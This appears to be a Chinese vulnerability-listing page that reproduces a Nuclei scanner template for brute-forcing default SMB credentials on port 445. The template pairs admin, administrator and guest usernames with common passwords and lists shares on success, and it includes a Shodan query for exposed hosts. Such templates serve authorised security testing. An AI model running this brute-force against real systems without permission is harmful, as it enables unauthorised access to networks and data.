smb-default-creds: SMB Default Credential - Bruteforce

日期: 2025-08-01 | 影响软件: SMB Default Creds | POC: 已公开

漏洞描述

Attempts to guess username/password combinations over SMB.

PoC代码[已公开]

id: smb-default-creds

info:
  name: SMB Default Credential - Bruteforce
  author: pussycat0x
  severity: high
  description: |
    Attempts to guess username/password combinations over SMB.
  reference:
    - https://nmap.org/nsedoc/scripts/smb-brute.html
  metadata:
    verified: true
    max-request: 9
    shodan-query: "port:445"
    product: dionaea
    vendor: dionaea
  tags: js,network,smb,enum,default,bruteforce,discovery

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      var m = require("nuclei/smb");
      var c = new m.SMBClient();
      var response = c.ListShares(Host, Port, User, Pass);
      response;

    args:
      Host: "{{Host}}"
      Port: "445"
      User: "{{usernames}}"
      Pass: "{{passwords}}"

    attack: clusterbomb
    payloads:
      usernames:
        - 'admin'
        - 'administrator'
        - 'guest'
      passwords:
        - 'admin'
        - 'password'
        - 'guest'

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'response != "[]"'
          - 'success == true'
        condition: and
# digest: 4a0a004730450220423768d61d69acfdd8e9d931afa253611b039ea8b515a2a9acc62a40ff768ccc022100e6a9d9a03da49e2e173ea503935fc34bed9a88d109334ebdc988d6931fe629b3:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/javascript/enumeration/smb/smb-default-creds.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐